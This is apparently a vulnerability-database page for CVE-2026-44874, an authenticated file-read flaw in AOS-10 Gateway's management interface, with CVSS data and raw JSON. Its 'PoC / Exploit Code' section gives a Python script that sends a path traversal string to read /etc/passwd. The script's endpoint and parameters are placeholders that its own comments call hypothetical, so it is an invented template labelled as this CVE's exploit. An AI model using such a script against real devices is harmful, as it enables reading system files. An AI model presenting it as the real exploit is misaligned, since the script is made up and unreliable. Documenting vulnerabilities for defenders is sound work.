Security Vulnerability Report
CVE-2026-44874 CVSS 4.9 MEDIUM

CVE-2026-44874

Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 20:16:46

Description

A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AOS-10 Gateway (for the specific affected versions, refer to the official HPE security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: Authenticated Sensitive File Read in AOS-10 Gateway
# CVE: CVE-2026-44874
# Description: This script demonstrates how an authenticated attacker might read sensitive files.

TARGET_URL = "https://<target-ip>/<management-path>"
SESSION_COOKIE = "<authenticated_session_cookie>"
FILE_PATH = "../../../etc/passwd"  # Example sensitive file

headers = {
    "Cookie": f"session={SESSION_COOKIE}",
    "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-44874-Scanner)"
}

# Hypothetical endpoint vulnerable to path traversal or arbitrary file read
params = {
    "action": "view_log",
    "file": FILE_PATH
}

try:
    response = requests.get(TARGET_URL, headers=headers, params=params, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Potential Vulnerability Detected!")
        print("[+] Response Content:")
        print(response.text[:500])  # Print first 500 chars
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44874", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:46.020", "lastModified": "2026-05-12T20:16:46.020", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}